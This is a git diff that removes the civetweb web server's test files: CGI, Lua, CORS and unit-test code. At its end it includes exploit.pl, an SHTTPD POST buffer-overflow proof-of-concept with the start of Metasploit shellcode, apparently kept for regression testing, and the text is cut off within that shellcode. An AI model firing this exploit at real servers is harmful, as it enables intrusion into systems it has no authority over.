-                'longText6' : "asdfjklhlkjhv8öajsdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui",

-                'async' : isAsync

-              },

-        dataType: 'json',

-        succes: function(data) {

-        },

-        error: function() {

-          ++errorCount;

-        },

-        complete: function(jqXHR, textStatus) {

-

-          --pendingCount;

-

-          document.getElementById('res'+id).innerHTML = textStatus;

-          console.log('id: ' + id + ' (' + pendingCount + '/' + totalCount + '), status: ' + textStatus);

-

-          if (pendingCount == 0) {

-            document.getElementById('resTotal').innerHTML = 'done';

-            console.log('complete, error count: ' + errorCount);

-            allErrorCount = allErrorCount + errorCount;

-            document.getElementById('resSAll').innerHTML = 'total errors: ' + allErrorCount + "/" + (pushCount*totalCount);

-          }

-        }

-      });

-

-    }

-

-

-    //-->

-    </script>

-

-  </head>

-  <body>

-    <p>

-      <div id="start">Test not started.</div>

-    </p>

-    <p>

-      <table>

-        <tr>

-          <td>

-            <input id="testButton1" type="button" onclick="javascript:runTest('GET', false)" value="sync GET"></input>

-          </td>

-          <td>

-            <input id="testButton2" type="button" onclick="javascript:runTest('POST', false)" value="sync POST"></input>

-          </td>

-        </tr>

-        <tr>

-          <td>

-            <input id="testButton3" type="button" onclick="javascript:runTest('GET', true)" value="async GET"></input>

-          </td>

-          <td>

-            <input id="testButton4" type="button" onclick="javascript:runTest('POST', true)" value="async POST"></input>

-          </td>

-        </tr>

-        <tr>

-          <td>

-            <input id="testButton5" type="button" onclick="autoTest=!autoTest; javascript:runAutoTest()" value="automatic test"></input>

-          </td>        

-          <td>

-            <input id="testButton6" type="button" onclick="NextTestType(); this.value=testType" value='cgi'></input>

-          </td>        

-        </tr>

-        

-        <tr>

-          <td>

-            <input id="testButtonReset" type="button" onclick="autoTest=false; javascript:location.reload(true)" value="reset"></input>

-          </td>

-          <td>

-            <input id="testButtonBack" type="button" onclick="history.back()" value="back"></input>

-          </td>

-        </tr>

-        <tr>

-          <td>

-            <input id="testButtonBox" type="button" onclick="javascript:mbox()" value="MsgBox"></input>            

-          </td>

-          <td>

-          </td>

-        </tr>

-      </table>

-    </p>

-    <p>

-      <table border="1">

-        <tr><th>Test</th><th>Result</th></tr>

-        <tr><td>1</td><td><div id="res1">not started</div></td></tr>

-        <tr><td>2</td><td><div id="res2">not started</div></td></tr>

-        <tr><td>3</td><td><div id="res3">not started</div></td></tr>

-        <tr><td>4</td><td><div id="res4">not started</div></td></tr>

-        <tr><td>5</td><td><div id="res5">not started</div></td></tr>

-        <tr><td>6</td><td><div id="res6">not started</div></td></tr>

-        <tr><td>7</td><td><div id="res7">not started</div></td></tr>

-        <tr><td>8</td><td><div id="res8">not started</div></td></tr>

-        <tr><td>9</td><td><div id="res9">not started</div></td></tr>

-        <tr><td>10</td><td><div id="res10">not started</div></td></tr>

-      </table>

-      <div id="resTotal">Push [Test] to start.</div>

-      <div id="resSAll"></div>

-    </p>

-  </body>

-</html>

diff --git a/thirdparty/civetweb-1.10/test/all_build_flags.pl b/thirdparty/civetweb-1.10/test/all_build_flags.pl
deleted file mode 100755
index ee225f9..0000000
--- a/thirdparty/civetweb-1.10/test/all_build_flags.pl
+++ /dev/null
@@ -1,28 +0,0 @@
-#!/usr/bin/env perl
-
-@flags = ("NO_POPEN", "NO_SSL", "NDEBUG", "DEBUG", "NO_CGI");
-my $num_flags = @flags;
-
-sub fail {
-	print "FAILED: @_\n";
-	exit 1;
-}
-
-my $platform = $ARGV[0] || "linux";
-
-for (my $i = 0; $i < 2 ** $num_flags; $i++) {
-	my $bitmask = sprintf("%*.*b", $num_flags, $num_flags, $i);
-	my @combination = ();
-	for (my $j = 0; $j < $num_flags; $j++) {
-		push @combination, $flags[$j] if substr($bitmask, $j, 1);
-	}
-	my $defines = join(" ", map { "-D$_" } @combination);
-	my $cmd = "CFLAGS=\"$defines\" make clean $platform >/dev/null";
-	system($cmd) == 0 or fail "build failed: $_";
-	print "Build succeeded, flags: [$defines]\n";
-	system("perl test/test.pl basic_tests >/dev/null") == 0
-		or fail "basic tests";
-	print "Basic tests: OK\n";
-}
-
-print "PASS: All builds passed!\n";
diff --git a/thirdparty/civetweb-1.10/test/bad.cgi b/thirdparty/civetweb-1.10/test/bad.cgi
deleted file mode 100755
index 1560f82..0000000
--- a/thirdparty/civetweb-1.10/test/bad.cgi
+++ /dev/null
@@ -1,6 +0,0 @@
-#!/bin/sh
-
-echo "echoing bad headers: server must report status 500"
-exec 1>&2
-echo "Bad CGI script (for test)"
-
diff --git a/thirdparty/civetweb-1.10/test/bad2.cgi b/thirdparty/civetweb-1.10/test/bad2.cgi
deleted file mode 100755
index efa4b54..0000000
--- a/thirdparty/civetweb-1.10/test/bad2.cgi
+++ /dev/null
@@ -1,3 +0,0 @@
-#!/usr/bin/env perl
-
-print "Status: 123 Please pass me to the client\r\n\r\n";
diff --git a/thirdparty/civetweb-1.10/test/bad_page.lp b/thirdparty/civetweb-1.10/test/bad_page.lp
deleted file mode 100644
index 84caacc..0000000
--- a/thirdparty/civetweb-1.10/test/bad_page.lp
+++ /dev/null
@@ -1 +0,0 @@
-test <? bad_script ?> test

diff --git a/thirdparty/civetweb-1.10/test/bad_script.lua b/thirdparty/civetweb-1.10/test/bad_script.lua
deleted file mode 100644
index 6140617..0000000
--- a/thirdparty/civetweb-1.10/test/bad_script.lua
+++ /dev/null
@@ -1 +0,0 @@
-bad_script 

diff --git a/thirdparty/civetweb-1.10/test/cgi_test.c b/thirdparty/civetweb-1.10/test/cgi_test.c
deleted file mode 100644
index bd446c0..0000000
--- a/thirdparty/civetweb-1.10/test/cgi_test.c
+++ /dev/null
@@ -1,40 +0,0 @@
-#include <stdio.h>
-#include <string.h>
-#include <stdlib.h>
-
-#if defined(_WIN32) || defined(WIN32) || defined(WINDOWS)
-#include <fcntl.h>
-#include <io.h>
-#endif
-
-int
-main(int argc, char *argv[])
-{
-	char buf[1024];
-	size_t rec_len = 0;
-	const char *response_header = "Content-Type: text/plain\r\n"
-	                              "Connection: close\r\n"
-	                              "\r\n";
-	const char *req_method = getenv("REQUEST_METHOD");
-	const char *con_length = getenv("CONTENT_LENGTH");
-
-#if defined(_WIN32) || defined(WIN32) || defined(WINDOWS)
-	_setmode(_fileno(stdin), _O_BINARY);
-	_setmode(_fileno(stdout), _O_BINARY);
-#endif
-
-	/* Write the response header with \r\n */
-	fwrite(response_header, 1, strlen(response_header), stdout);
-
-	/* Headline for generated reply: */
-	printf("Got message:\n  Method: %s\n  Content-Length: %s\n  Content: ",
-	       req_method,
-	       con_length ? con_length : "not set");
-
-	/* Read all data from stdin and send it to stdout */
-	while ((rec_len = fread(buf, 1, sizeof(buf) - 1, stdin)) > 0) {
-		fwrite(buf, 1, rec_len, stdout);
-	}
-
-	return 0;
-}
diff --git a/thirdparty/civetweb-1.10/test/cgi_test.html b/thirdparty/civetweb-1.10/test/cgi_test.html
deleted file mode 100644
index 28ad72b..0000000
--- a/thirdparty/civetweb-1.10/test/cgi_test.html
+++ /dev/null
@@ -1,12 +0,0 @@
-<html>
-  <head>
-    <title>CGI POST Test</title>
-  </head>
-  <body>
-    <h1>CGI POST Test</h1>
-    <form action="cgi_test.cgi" method="post">
-      <input type="text" name="test" />
-      <input type="submit" />
-    </form>
-  </body>
-</html>
diff --git a/thirdparty/civetweb-1.10/test/civetweb_check.h b/thirdparty/civetweb-1.10/test/civetweb_check.h
deleted file mode 100644
index 4701f22..0000000
--- a/thirdparty/civetweb-1.10/test/civetweb_check.h
+++ /dev/null
@@ -1,96 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-#ifndef TEST_CIVETWEB_CHECK_H_
-#define TEST_CIVETWEB_CHECK_H_
-
-#ifdef __clang__
-#pragma clang diagnostic push
-// FIXME: check uses GCC specific variadic macros that are non-standard
-#pragma clang diagnostic ignored "-Wgnu-zero-variadic-macro-arguments"
-#endif
-
-#if defined(__MINGW__) || defined(__GNUC__)
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wall"
-/* Disable warnings for defining _CRT_SECURE_NO_* (here) and
- * _CHECK_CHECK_STDINT_H (in check.h)
- */
-/* Disable until Warning returns to Travis CI or AppVeyor
-#pragma GCC diagnostic ignored "-Wunknown-pragmas"
-#pragma GCC diagnostic ignored "-Wno-variadic-macros"
-#pragma GCC diagnostic ignored "-Wreserved-id-macro"
-*/
-#endif
-
-#ifdef _MSC_VER
-#undef pid_t
-#define pid_t int
-/* Unreferenced formal parameter. START_TEST has _i */
-#pragma warning(disable : 4100)
-/* conditional expression is constant . asserts use while(0) */
-#pragma warning(disable : 4127)
-#endif
-#include <stdint.h>
-
-/* All unit tests use the "check" framework.
- * Download from https://libcheck.github.io/check/
- */
-#include "check.h"
-
-#if (CHECK_MINOR_VERSION < 11)
-#ifndef LOCAL_TEST
-#error "CivetWeb unit tests require at least check 0.11.0"
-#endif
-#endif
-
-#ifdef __clang__
-#pragma clang diagnostic pop
-#endif
-
-#if !defined(_CRT_SECURE_NO_WARNINGS)
-#define _CRT_SECURE_NO_WARNINGS
-#endif
-#if !defined(_CRT_SECURE_NO_DEPRECATE)
-#define _CRT_SECURE_NO_DEPRECATE
-#endif
-
-#if defined(__MINGW__) || defined(__GNUC__)
-#pragma GCC diagnostic pop
-#endif
-
-#ifdef __clang__
-/* When using -Weverything, clang does not accept it's own headers
- * in a release build configuration. Disable what is too much in
- * -Weverything. */
-#pragma clang diagnostic ignored "-Wdisabled-macro-expansion"
-#endif
-
-/* A minimal timeout used for all tests with the "check" framework. */
-#define civetweb_min_test_timeout (30)
-
-/* A minimal timeout for all tests starting a server. */
-#define civetweb_min_server_test_timeout (civetweb_min_test_timeout + 30)
-
-/* A default timeout for all tests running multiple requests to a server. */
-#define civetweb_mid_server_test_timeout                                       \
-	(civetweb_min_server_test_timeout + 180)
-
-#endif /* TEST_CIVETWEB_CHECK_H_ */
diff --git a/thirdparty/civetweb-1.10/test/cors.html b/thirdparty/civetweb-1.10/test/cors.html
deleted file mode 100644
index 10fb99a..0000000
--- a/thirdparty/civetweb-1.10/test/cors.html
+++ /dev/null
@@ -1,75 +0,0 @@
-<!DOCTYPE html>

-<html>

-<head>

-<title>CORS test</title>

-<style>

- html,body{font:normal 1em arial,helvetica;}

-</style>

-

-<script> // http://www.html5rocks.com/en/tutorials/cors/

-

-// Create the XHR object.

-function createCORSRequest(method, url) {

-  var xhr = new XMLHttpRequest();

-  if ("withCredentials" in xhr) {

-    // XHR for Chrome/Firefox/Opera/Safari.

-    xhr.open(method, url, true);

-  } else if (typeof XDomainRequest != "undefined") {

-    // XDomainRequest for IE.

-    xhr = new XDomainRequest();

-    xhr.open(method, url);

-  } else {

-    // CORS not supported.

-    xhr = null;

-  }

-  return xhr;

-}

-

-// Helper method to parse the title tag from the response.

-function getTitle(text) {

-  return text.match('<title>(.*)?</title>')[1];

-}

-

-// Make the actual CORS request.

-function makeCorsRequest(method, resource) {

-  var url = "http://localhost:8080/cors.reply." + resource;

-  var xhr = createCORSRequest(method, url);

-  if (!xhr) {

-    alert('ERROR: CORS not supported');

-    return;

-  }

-

-  // Response handlers.

-  xhr.onload = function() {

-    var text = xhr.responseText;

-    var title = getTitle(text);

-    alert('Response from CORS request to ' + url + ':\n' + title);

-  };

-

-  xhr.onerror = function() {

-    alert('ERROR: the request failed.');

-  };

-

-  xhr.send();

-}

-

-function start() {

-  var el = document.getElementById("from");

-  el.innerHTML = "Test CORS from " + document.URL + " to http://localhost:8080/cors.reply.*";

-  if ((document.URL.indexOf("localhost") >= 0) || (document.URL.indexOf("127.0.0.1") >= 0)) {

-    alert("This CORS test is only meaningful, if you open this site with a different url than \'localhost\' (127.0.0.1).\nYou may use a different IP of the same machine.");

-  }

-}

-</script>

-

-</head>

-<body onload="start()">

- <h1>Cross-origin resource sharing test</h1>

- <p id="from">*** Error: Javascript is not activated. This test will not work. ***</p>

- <button onclick="makeCorsRequest('GET', 'html')">Run CORS GET request (static resource)</button>

- <button onclick="makeCorsRequest('GET', 'shtml')">Run CORS GET request (ssi)</button>

- <button onclick="makeCorsRequest('GET', 'lua/getit')">Run CORS GET request (dynamic resource)</button>

- <button onclick="makeCorsRequest('PUT', 'lua/putit')">Run CORS PUT request (dynamic resource)</button>

- <p>More information on CORS: See <a href="http://enable-cors.org/">enable-cors.org</a> and <a href="http://www.html5rocks.com/en/tutorials/cors/">html5rocks.com</a>.</p>

-</body>

-</html>

diff --git a/thirdparty/civetweb-1.10/test/cors.reply.html b/thirdparty/civetweb-1.10/test/cors.reply.html
deleted file mode 100644
index 26d88df..0000000
--- a/thirdparty/civetweb-1.10/test/cors.reply.html
+++ /dev/null
@@ -1,7 +0,0 @@
-<!DOCTYPE html>

-<html>

-<head><title>CORS test reply - test OK</title></head>

-<body>

-Do not load this page directly - use cors.html instead!

-</body>

-</html>

diff --git a/thirdparty/civetweb-1.10/test/cors.reply.lua b/thirdparty/civetweb-1.10/test/cors.reply.lua
deleted file mode 100644
index 57b9727..0000000
--- a/thirdparty/civetweb-1.10/test/cors.reply.lua
+++ /dev/null
@@ -1,86 +0,0 @@
--- http://www.html5rocks.com/static/images/cors_server_flowchart.png

-

-if not mg.request_info.http_headers.Origin and not mg.request_info.http_headers.origin then

-

-  mg.write("HTTP/1.0 200 OK\r\n")

-  mg.write("Connection: close\r\n")

-  mg.write("Content-Type: text/html; charset=utf-8\r\n")

-  mg.write("\r\n")

-  mg.write("This test page should not be used directly. Open cors.html instead.")

-  return

-end

-

-if mg.request_info.request_method == "OPTIONS" then

-

-  -- Note: This is a test example showing how a script could handle

-  -- a preflight request directly. However, now the server is able

-  -- to handle preflight requests, so scripts do no longer need to

-  -- do this - except it has been disabled in the server by setting

-  -- the access_control_allow_methods configuration parameter to

-  -- an empty string. 

-

-  local acrm = mg.request_info.http_headers['Access-Control-Request-Method'];

-  if (acrm) then

-    local acrh = nil -- mg.request_info.http_headers['Access-Control-Request-Header'];

-    if (acrm~='PUT') then

-      -- invalid request

-      mg.write("HTTP/1.0 403 Forbidden\r\n")

-      mg.write("Connection: close\r\n")

-      mg.write("\r\n")

-      return

-    else

-      -- preflight request

-      mg.write("HTTP/1.0 200 OK\r\n")

-      mg.write("Access-Control-Allow-Methods: PUT\r\n")

-      if (acrh) then

-        mg.write("Access-Control-Allow-Headers: " .. acrh .. "\r\n")

-      end

-      mg.write("Access-Control-Allow-Origin: *\r\n")

-      mg.write("Connection: close\r\n")

-      mg.write("Content-Type: text/html; charset=utf-8\r\n")

-      mg.write("\r\n")

-      return

-    end

-  end

-end

-

-

--- actual request

-if mg.request_info.request_method == "GET" then

-

-  mg.write("HTTP/1.0 200 OK\r\n")

-  mg.write("Access-Control-Allow-Origin: *\r\n")

-  mg.write("Connection: close\r\n")

-  mg.write("Content-Type: text/html; charset=utf-8\r\n")

-  mg.write("\r\n")

-  mg.write([[<!DOCTYPE html>

-  <html>

-  <head><title>CORS dynamic GET test reply - test OK</title></head>

-  <body>This should never be shown</body>

-  </html>

-  ]])

-  return

-end

-

-

-if mg.request_info.request_method == "PUT" then

-

-  mg.write("HTTP/1.0 200 OK\r\n")

-  mg.write("Access-Control-Allow-Origin: *\r\n")

-  mg.write("Connection: close\r\n")

-  mg.write("Content-Type: text/html; charset=utf-8\r\n")

-  mg.write("\r\n")

-  mg.write([[<!DOCTYPE html>

-  <html>

-  <head><title>CORS dynamic PUT test reply - test OK</title></head>

-  <body>This should never be shown</body>

-  </html>

-  ]])

-  return

-end

-

--- other HTTP method

-mg.write("HTTP/1.0 403 Forbidden\r\n")

-mg.write("Connection: close\r\n")

-mg.write("\r\n")

-

diff --git a/thirdparty/civetweb-1.10/test/cors.reply.shtml b/thirdparty/civetweb-1.10/test/cors.reply.shtml
deleted file mode 100644
index 26d88df..0000000
--- a/thirdparty/civetweb-1.10/test/cors.reply.shtml
+++ /dev/null
@@ -1,7 +0,0 @@
-<!DOCTYPE html>

-<html>

-<head><title>CORS test reply - test OK</title></head>

-<body>

-Do not load this page directly - use cors.html instead!

-</body>

-</html>

diff --git a/thirdparty/civetweb-1.10/test/delayed.cgi b/thirdparty/civetweb-1.10/test/delayed.cgi
deleted file mode 100644
index ccf7768..0000000
--- a/thirdparty/civetweb-1.10/test/delayed.cgi
+++ /dev/null
@@ -1,20 +0,0 @@
-#!/bin/sh
-
-sleep 2
-
-echo "Content-Type: text/plain"
-
-sleep 2
-
-echo
-
-sleep 2
-
-echo "Query string:"
-
-sleep 2
-
-echo $QUERY_STRING
-
-sleep 2
-
diff --git a/thirdparty/civetweb-1.10/test/dir with spaces/hello.cgi b/thirdparty/civetweb-1.10/test/dir with spaces/hello.cgi
deleted file mode 100755
index 39decbe..0000000
--- a/thirdparty/civetweb-1.10/test/dir with spaces/hello.cgi
+++ /dev/null
@@ -1,3 +0,0 @@
-#!/usr/bin/env perl
-
-print "Content-Type: text/plain\n\nhello\n";
diff --git a/thirdparty/civetweb-1.10/test/echo.lua b/thirdparty/civetweb-1.10/test/echo.lua
deleted file mode 100644
index bc71553..0000000
--- a/thirdparty/civetweb-1.10/test/echo.lua
+++ /dev/null
@@ -1,41 +0,0 @@
-
-if mg.lua_type ~= "websocket" then
-  mg.write("HTTP/1.0 403 Forbidden\r\n")
-  mg.write("Connection: close\r\n")
-  mg.write("\r\n")
-  mg.write("forbidden")
-  return
-end
-
-
--- table of all active connection
-allConnections = {}
-
--- function to get a client identification string
-function who(tab)
-  local ri = allConnections[tab.client].request_info
-  return ri.remote_addr .. ":" .. ri.remote_port
-end
-
--- Callback to accept or reject a connection
-function open(tab)
-  allConnections[tab.client] = tab
-  return true -- return true to accept the connection
-end
-
--- Callback for "Websocket ready"
-function ready(tab)
-  return true -- return true to keep the connection open
-end
-
--- Callback for "Websocket received data"
-function data(tab)
-    mg.write(1, tab.data);
-    return true -- return true to keep the connection open
-end
-
--- Callback for "Websocket is closing"
-function close(tab)
-    allConnections[tab.client] = nil
-end
-
diff --git a/thirdparty/civetweb-1.10/test/embed.c b/thirdparty/civetweb-1.10/test/embed.c
deleted file mode 100644
index 174e17c..0000000
--- a/thirdparty/civetweb-1.10/test/embed.c
+++ /dev/null
@@ -1,182 +0,0 @@
-// Copyright (c) 2004-2009 Sergey Lyubka
-//
-// Permission is hereby granted, free of charge, to any person obtaining a copy
-// of this software and associated documentation files (the "Software"), to deal
-// in the Software without restriction, including without limitation the rights
-// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-// copies of the Software, and to permit persons to whom the Software is
-// furnished to do so, subject to the following conditions:
-//
-// The above copyright notice and this permission notice shall be included in
-// all copies or substantial portions of the Software.
-//
-// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-// THE SOFTWARE.
-//
-// Unit test for the civetweb web server. Tests embedded API.
-
-
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-#ifndef _WIN32
-#include <unistd.h>
-#endif
-
-#include "civetweb.h"
-
-#if !defined(LISTENING_PORT)
-#define LISTENING_PORT "23456"
-#endif
-
-static const char *standard_reply = "HTTP/1.1 200 OK\r\n"
-  "Content-Type: text/plain\r\n"
-  "Connection: close\r\n\r\n";
-
-static void test_get_var(struct mg_connection *conn,
-                         const struct mg_request_info *ri) {
-  char *var, *buf;
-  size_t buf_len;
-  const char *cl;
-  int var_len;
-
-  mg_printf(conn, "%s", standard_reply);
-
-  buf_len = 0;
-  var = buf = NULL;
-  cl = mg_get_header(conn, "Content-Length");
-  mg_printf(conn, "cl: %p\n", cl);
-  if ((!strcmp(ri->request_method, "POST") ||
-       !strcmp(ri->request_method, "PUT"))
-      && cl != NULL) {
-    buf_len = atoi(cl);
-    buf = malloc(buf_len);
-    /* Read in two pieces, to test continuation */
-    if (buf_len > 2) {
-      mg_read(conn, buf, 2);
-      mg_read(conn, buf + 2, buf_len - 2);
-    } else {
-      mg_read(conn, buf, buf_len);
-    }
-  } else if (ri->query_string != NULL) {
-    buf_len = strlen(ri->query_string);
-    buf = malloc(buf_len + 1);
-    strcpy(buf, ri->query_string);
-  }
-  var = malloc(buf_len + 1);
-  var_len = mg_get_var(buf, buf_len, "my_var", var, buf_len + 1);
-  mg_printf(conn, "Value: [%s]\n", var);
-  mg_printf(conn, "Value size: [%d]\n", var_len);
-  free(buf);
-  free(var);
-}
-
-static void test_get_header(struct mg_connection *conn,
-                            const struct mg_request_info *ri) {
-  const char *value;
-  int i;
-
-  mg_printf(conn, "%s", standard_reply);
-  printf("HTTP headers: %d\n", ri->num_headers);
-  for (i = 0; i < ri->num_headers; i++) {
-    printf("[%s]: [%s]\n", ri->http_headers[i].name, ri->http_headers[i].value);
-  }
-
-  value = mg_get_header(conn, "Host");
-  if (value != NULL) {
-    mg_printf(conn, "Value: [%s]", value);
-  }
-}
-
-static void test_get_request_info(struct mg_connection *conn,
-                                  const struct mg_request_info *ri) {
-  int i;
-
-  mg_printf(conn, "%s", standard_reply);
-
-  mg_printf(conn, "Method: [%s]\n", ri->request_method);
-  mg_printf(conn, "URI: [%s]\n", ri->uri);
-  mg_printf(conn, "HTTP version: [%s]\n", ri->http_version);
-
-  for (i = 0; i < ri->num_headers; i++) {
-    mg_printf(conn, "HTTP header [%s]: [%s]\n",
-              ri->http_headers[i].name,
-              ri->http_headers[i].value);
-  }
-
-  mg_printf(conn, "Query string: [%s]\n",
-            ri->query_string ? ri->query_string: "");
-  mg_printf(conn, "Remote IP: [%lu]\n", ri->remote_ip);
-  mg_printf(conn, "Remote port: [%d]\n", ri->remote_port);
-  mg_printf(conn, "Remote user: [%s]\n",
-            ri->remote_user ? ri->remote_user : "");
-}
-
-static void test_error(struct mg_connection *conn,
-                       const struct mg_request_info *ri) {
-  int status = (int) ri->ev_data;
-  mg_printf(conn, "HTTP/1.1 %d XX\r\n"
-            "Conntection: close\r\n\r\n", status);
-  mg_printf(conn, "Error: [%d]", status);
-}
-
-static void test_post(struct mg_connection *conn,
-                      const struct mg_request_info *ri) {
-  const char *cl;
-  char *buf;
-  int len;
-
-  mg_printf(conn, "%s", standard_reply);
-  if (strcmp(ri->request_method, "POST") == 0 &&
-      (cl = mg_get_header(conn, "Content-Length")) != NULL) {
-    len = atoi(cl);
-    if ((buf = malloc(len)) != NULL) {
-      mg_write(conn, buf, len);
-      free(buf);
-    }
-  }
-}
-
-static const struct test_config {
-  enum mg_event event;
-  const char *uri;
-  void (*func)(struct mg_connection *, const struct mg_request_info *);
-} test_config[] = {
-  {MG_NEW_REQUEST, "/test_get_header", &test_get_header},
-  {MG_NEW_REQUEST, "/test_get_var", &test_get_var},
-  {MG_NEW_REQUEST, "/test_get_request_info", &test_get_request_info},
-  {MG_NEW_REQUEST, "/test_post", &test_post},
-  {MG_HTTP_ERROR, "", &test_error},
-  {0, NULL, NULL}
-};
-
-static void *callback(enum mg_event event,
-                      struct mg_connection *conn) {
-  const struct mg_request_info *request_info = mg_get_request_info(conn);
-  int i;
-
-  for (i = 0; test_config[i].uri != NULL; i++) {
-    if (event == test_config[i].event &&
-        (event == MG_HTTP_ERROR ||
-         !strcmp(request_info->uri, test_config[i].uri))) {
-      test_config[i].func(conn, request_info);
-      return "processed";
-    }
-  }
-
-  return NULL;
-}
-
-int main(void) {
-  struct mg_context *ctx;
-  const char *options[] = {"listening_ports", LISTENING_PORT, NULL};
-
-  ctx = mg_start(callback, NULL, options);
-  pause();
-  return 0;
-}
diff --git a/thirdparty/civetweb-1.10/test/env.cgi b/thirdparty/civetweb-1.10/test/env.cgi
deleted file mode 100755
index 479e1fd..0000000
--- a/thirdparty/civetweb-1.10/test/env.cgi
+++ /dev/null
@@ -1,46 +0,0 @@
-#!/usr/bin/env perl
-
-use Cwd;
-use CGI;
-
-use vars '%in';
-CGI::ReadParse();
-
-print "Content-Type: text/html\r\n\r\n";
-
-print "<pre>\n";
-foreach my $key (sort keys %ENV) {
-	print "$key=$ENV{$key}\n";
-}
-
-print "\n";
-
-foreach my $key (sort keys %in) {
-	print "$key=$in{$key}\n";
-}
-
-print "\n";
-
-print 'CURRENT_DIR=' . getcwd() . "\n";
-print "</pre>\n";
-
-my $stuff = <<EOP ;
-<script language="javascript">
-	function set_val() {
-	}
-</script>
-<form method=get>
-	<input type=hidden name=a>
-	<input type=text name=_a onChange="javascript: this.form.a.value=this.value;">
-	<input type=submit value=get>
-</form>
-
-<form method=post>
-	<input type=text name=b>
-	<input type=submit value=post>
-</form>
-EOP
-
-#system('some shit');
-
-print $stuff;
diff --git a/thirdparty/civetweb-1.10/test/error.lua b/thirdparty/civetweb-1.10/test/error.lua
deleted file mode 100644
index b78d4ac..0000000
--- a/thirdparty/civetweb-1.10/test/error.lua
+++ /dev/null
@@ -1,12 +0,0 @@
-mg.write("HTTP/1.0 200 OK\r\n")

-mg.write("Content-Type: text/html\r\n")

-mg.write("\r\n")

-mg.write([[<html><body>

-  <p>Lua error handler:</p>

-  <p>Status code: ]])

-

-mg.write(tostring(mg.request_info.status))

-

-mg.write([[</p>

-</body></html>

-]])
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/test/error404.htm b/thirdparty/civetweb-1.10/test/error404.htm
deleted file mode 100644
index 357db2c..0000000
--- a/thirdparty/civetweb-1.10/test/error404.htm
+++ /dev/null
@@ -1,10 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"

-   "http://www.w3.org/TR/html4/frameset.dtd">

-<HTML>

-<HEAD>

-<TITLE>Error</TITLE>

-</HEAD>

-<BODY>

-Custom error page

-</BODY>

-</HTML>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/test/exit.lua b/thirdparty/civetweb-1.10/test/exit.lua
deleted file mode 100644
index 40356e3..0000000
--- a/thirdparty/civetweb-1.10/test/exit.lua
+++ /dev/null
@@ -1,15 +0,0 @@
-

-msg=[[<html><body>

-<p>Exit CivetWeb</p>

-</body></html>

-]]

-

-mg.write("HTTP/1.0 200 OK\r\n")

-mg.write("Connection: close\r\n")

-mg.write("Content-Length: " .. #msg .. "\r\n")

-mg.write("Content-Type: text/html\r\n")

-mg.write("\r\n")

-mg.write(msg)

-

-os.exit(0)

-

diff --git a/thirdparty/civetweb-1.10/test/exploit.pl b/thirdparty/civetweb-1.10/test/exploit.pl
deleted file mode 100755
index 2067089..0000000
--- a/thirdparty/civetweb-1.10/test/exploit.pl
+++ /dev/null
@@ -1,69 +0,0 @@
-#!/usr/bin/perl -w
-
-#  SHTTPD Buffer Overflow (POST)
-#  Tested on SHTTPD 1.34 WinXP SP1 Hebrew
-#  http://shttpd.sourceforge.net
-#  Codded By SkOd, 05/10/2006
-#  ISRAEL
-#
-#    details:
-#    EAX 00000194 , ECX 009EBCA8 , EDX 00BC488C
-#    EBX 00000004 , EIP 41414141 , EBP 41414141
-#    ESI 00BC4358 , EDI 00BCC3CC ASCII "POST"
-#    ESP 009EFC08 ASCII 41,"AA...AAA"
-
-
-use IO::Socket;
-
-sub fail(){
-syswrite STDOUT, "[-]Connect failed.\n";
-exit;
-}
-
-sub header()
-{
-print("##################################\n");
-print("SHTTPD (POST) Buffer Overflow.\n");
-print("[http://shttpd.sourceforge.net]\n");
-print("Codded By SkOd, 05/10/2006\n");
-print("##################################\n");
-}
-
-if (@ARGV < 1)
-{
-    &header();
-    print("Usage: Perl shttpd.pl [host]\n");
-    exit;
-}
-
-&header();
-$host=$ARGV[0];
-$port="80";
-$host=~ s/(http:\/\/)//eg;
-
-#win32_exec- CMD=calc Size=160 (metasploit.com)
-$shell =
-"%33%c9%83%e9%de%d9%ee%d9%74%24%f4%5b%81%73%13%52".
-"%ca%2b%e0%83%eb%fc%e2%f4%ae%22%6f%e0%52%ca%a0%a5".
-"%6e%41%57%e5%2a%cb%c4%6b%1d%d2%a0%bf%72%cb%c0%a9".
-"%d9%fe%a0%e1%bc%fb%eb%79%fe%4e%eb%94%55%0b%e1%ed".
